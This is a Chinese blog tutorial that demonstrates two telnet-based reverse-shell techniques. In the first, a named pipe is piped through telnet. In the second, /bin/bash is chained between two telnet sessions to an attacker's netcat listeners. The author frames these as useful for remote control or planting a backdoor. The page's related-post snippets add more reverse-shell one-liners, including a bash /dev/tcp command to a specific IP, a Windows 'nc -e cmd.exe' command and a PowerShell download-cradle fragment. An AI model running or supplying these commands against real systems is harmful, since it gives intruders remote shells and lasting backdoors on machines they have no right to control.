windows反弹_利用telnet反弹shell的两种方法

最新推荐文章于 2024-04-26 10:43:01 发布
最新推荐文章于 2024-04-26 10:43:01 发布
阅读量515 收藏
点赞数
文章标签: windows反弹
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42302638/article/details/113450507
版权

9a5c61a1b505dbc51b06bb79fbab33b2.gif

今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。

前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。

这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。

攻击机:

49cbdb760ee921b95a2a8dae8b8d4ad3.png

目标机:

9cf80119e34a980eb48840925e4ae7be.png

下面给大家演示一下如何反弹shell:

第一种:

1. 攻击机先执行监听:nc -l 2222

c3875804b963f818fa85460d07a130fe.png

2. 目标机执行:mknod a p; telnet x.x.x.x 2222 0a  (x.x.x.x为攻击机ip)

83503444830775fcb7a57d26f1a4a811.png

3. 攻击机已经获得shell(没有提示),尝试执行命令:

1c2c48d3f5ee52958c2a49c84f8e4e30.png

第二种:

1. 攻击机需要开两个终端分别监听两个端口:nc -l 6666,nc -l 5555

a44e65902d280112773bf5697d500adc.png

2. 目标机执行:telnet x.x.x.x 6666 | /bin/bash | telnet x.x.x.x 5555 (x.x.x.x为攻击机ip)

8f77b8e7ec9387f705477c6611a025e9.png

3. 目标机已经获得shell,尝试执行命令(第一个终端执行命令会在第二个终端回显):

e6e6f9c272c6e7af7e60013ee0416270.png

这就是利用telnet反弹shell的两种方式,当然也不仅有这两种,网上可以找到其他各种反弹的方式,不过原理都差不多。

本次演示使用的两个系统都是centos7,且近乎初始化的系统,演示是截图这种效果。根据操作系统不同,有的系统获取到shell或者被目标机telnet连接时是会有回显的。

2003b74746e66aac732162091bb360f5.png

你可能喜欢

不知道密码的情况下hacking mysql并反弹shell

zabbix反弹shell并拿下系统root权限

2d54386e4a17d0648d37875aeff29363.png

包包妈咪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cmd反弹shell提权
10-24
cmd反弹shell提权
Windows 反弹shell方法
weixin_53747497的博客
07-12 2725
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
Windows反弹shell的方式
ws1813004226的博客
05-25 6027
一、Windows反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
Windows反弹Shell
最新发布
qq_62073002的博客
04-26 830
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3455
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
winshell原代码.rar_telnet_winshell
09-22
【winshell原代码.rar_telnet_winshell】是一个与 TelnetWindows Shell 相关的压缩包,其中包含了一个小巧的 Telnet 程序的源代码。Telnet 是一种网络协议,允许用户通过网络远程登录到另一台计算机,执行命令行...
Telnet_Server_on_windows.zip_telnet server
09-23
Windows环境下搭建Telnet服务器详解》 在信息技术领域,网络通信是不可或缺的一部分,而Telnet协议作为早期的远程登录协议,对于初学者来说是理解网络编程基础的好工具。本教程将详细阐述如何在Windows操作系统上...
Net_Telnet-master.zip_The Master_php telnet_telnet
09-14
其中,TELNET协议作为一种古老的远程登录协议,虽然在安全性上存在一定的局限性,但在特定场景下仍然有着广泛的应用。本文将围绕“Net_Telnet-master.zip”这个项目,深入探讨如何使用PHP实现TELNET协议,并介绍相关...
tserver.zip_Telnet00024.rar_simple telnet_telnet_telnet server
07-14
标题“tserver.zip_Telnet00024.rar_simple telnet_telnet_telnet server”暗示我们关注的是一个关于Telnet服务器的压缩文件,它可能包含了实现简单Telnet服务的源代码或者相关教程。描述中的“一个简单的telnet ...
telnet.rar_网络_Windows_Unix_
08-11
Telnet是一种基于TCP/IP协议族的远程访问协议,它允许用户通过Internet或其他网络从一台计算机(客户端)连接到另一台计算机(服务器),从而进行交互式会话,例如远程登录、执行命令等操作。这个压缩包可能包含了在...
反弹cmd命令
12-06
反弹cmd命令
渗透测试-window反弹shell
lza20001103的博客
05-11 4384
window反弹shell
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
Window下的反弹shell
qq_58000413的博客
05-05 1177
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
反弹shell
A_Alger的博客
09-09 266
多种姿势反弹shell bash attacker 监听 nc -lvvp 4444 victim 运行 bash -i >& /dev/tcp//4444 0>&1 nc 支持 -e 选项 attacker 监听 nc -lvvp 4444 victim 运行 nc 4444 -t -e /bin/bash python attacker 监听 nc -...
各种shell反弹方法
weixin_46626737的博客
05-16 2613
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
反弹Shell方法论,Windows
大河之犬的博客
10-10 816
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
各种反弹shell方式
m0_58606546的博客
11-17 2296
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
内网渗透-反弹shell的N种姿势
lza20001103的博客
04-15 1059
内网渗透-反弹shell的N种姿势
echo20_telnet_shell
09-06
echo20_telnet_shell是一个命令行工具,用于在网络上远程访问并操作远程设备的命令行界面。telnet是一种远程登录协议,它允许用户通过网络连接到远程设备上的命令行界面。 使用echo20_telnet_shell,用户可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值